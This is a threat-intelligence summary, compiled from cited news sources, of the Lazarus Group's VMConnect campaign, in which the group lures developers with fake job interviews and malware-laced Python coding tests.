The Lazarus Group [1] [2] [3] [4] [5] [6] [7], a North Korean state-sponsored threat actor [3] [8], has been observed evolving its “fake job” hacking campaign by targeting developers with new malicious software packages on open source repositories.
Description
As part of its VMConnect campaign [1] [4] [5] [6], the group poses as employees of companies like Capital One, using fake job interviews to trick developers into downloading malware [5] [6]. Recently, the group has been targeting Python developers with a fake coding test project hosted on GitHub, disguised as a password manager project [3]. Victims are asked to download and install the password manager as part of a test [3], which actually deploys secondary malicious code [3]. The malware acts as a downloader [3], allowing the attackers to steal information and potentially deploy backdoors and infostealers [3]. This campaign has been active since August 2023 and is believed to still be ongoing [3], with Lazarus Group targeting developers working on cryptocurrency projects to fund their state apparatus and weapons program [3]. The campaign, known as VMConnect [6], was first identified in August 2023 and has been linked to GitHub projects associated with previous targeted attacks [7]. This activity highlights the threat actors’ use of job interviews as an infection vector and their impersonation of reputable organizations to carry out their operations [7]. Compromising a developer can have severe consequences as they often have access to sensitive data and production environments [4]. The infection chain aligns with North Korea’s typical tactics [4], techniques [4], and procedures [4]. Previous attacks by the Lazarus Group involved using malicious PyPI packages [4], LinkedIn accounts posing as recruiters [1] [4], and malware delivery via CHM files [4]. Overlapping tactics include the use of malicious Python packages [4], encoded downloader functions [4], and fake job interviews to lure developers into executing malware [4]. Adding a dedicated threat intelligence team to monitor Lazarus Group activity can provide a strategic advantage in detecting and mitigating threats early [4]. This attack is linked to Lazarus’s ‘VMConnect campaign’ [8], targeting developers with trojanized job offer documents [8]. A base64 obfuscated malware downloader is hidden in the test files [8], establishing a connection with a C2 server for further instructions [8]. This campaign represents a significant evolution in Lazarus Group’s strategy [2], moving beyond traditional targets to focus on developers and potential supply chain attacks [2]. Cybersecurity experts urge developers and organizations to adopt stricter security measures to mitigate the risks posed by such malicious campaigns [2].
Conclusion
The recent wave of attacks linked to North Korea’s Lazarus Group is targeting software developers through fraudulent job recruitment schemes as part of the VMConnect campaign [1]. Malicious actors pose as recruiters from financial services firms [1], distributing malicious Python packages disguised as coding tests to compromise developer systems [1]. Deceptive methods [1], including fake LinkedIn profiles [1], are used to trick developers into downloading and executing malicious code [1]. The sophistication of Lazarus Group’s tactics highlights the need for increased awareness and cybersecurity measures among developers [1].
References
[1] https://informationsecuritybuzz.com/lazarus-targets-devs-fake-coding-tests/
[2] https://www.secureworld.io/industry-news/lazarus-developers-coding-test-scam
[3] https://www.techradar.com/pro/security/north-korean-lazarus-hackers-are-using-a-fake-coding-test-to-steal-passwords
[4] https://www.scmagazine.com/news/lazarus-group-tricks-developers-to-load-malware-via-fake-recruiting-tests
[5] https://www.cyclonis.com/developers-targeted-fake-coding-tests-lazarus-group/
[6] https://www.infosecurity-magazine.com/news/lazarus-developers-vmconnect/
[7] https://thehackernews.com/2024/09/developers-beware-lazarus-group-uses.html
[8] https://fieldeffect.com/blog/lazarus-tricks-job-seeking-developers-with-malware-laced-coding-test
